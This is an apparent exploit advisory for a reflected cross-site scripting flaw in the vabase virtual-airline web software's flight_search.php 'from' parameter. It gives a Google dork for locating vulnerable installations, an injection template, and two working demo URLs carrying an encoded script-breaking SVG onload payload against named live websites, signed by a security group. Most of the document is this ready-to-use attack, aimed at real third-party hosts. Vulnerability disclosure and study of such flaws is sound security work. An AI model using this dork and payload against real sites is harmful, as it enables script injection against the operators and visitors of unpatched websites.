vabase– Cross Site Scripting vulnerability (xss)

#Exploit Title: vabase– Cross Site Scripting vulnerability (xss)
#Date: 2020-08-13
#Exploit Author: Mostafa Farzaneh
#Vendor Homepage: www.vabase.com
#Google Dork: "Powered & Designed by vaBase.com"
#Category: webapps
#Tested On: windows 10, Firefox
#Software Link: www.vabase.com

 
Proof of Concept:
1-Search dork
2-https://target/flight_search.php?from=" > [XSS Inject Payload ]

Demo: https://www.powersetva.com/flight_search.php?from=%22%3E%3C/script%3E%3Csvg%20onload=alert(1)%3E&ac=B789&op=%&dur=2-4
Demo: http://livewireairlines.vabase.com/flight_search.php?from=%22%3E%3C/script%3E%3Csvg%20onload=alert(1)%3E&ac=%&op=CYUL%20Montreal&dur=1-2
********************************************************* 
#Discovered by: Mostafa Farzaneh from PywebSecurity team
#Telegram: @pyweb_security
*********************************************************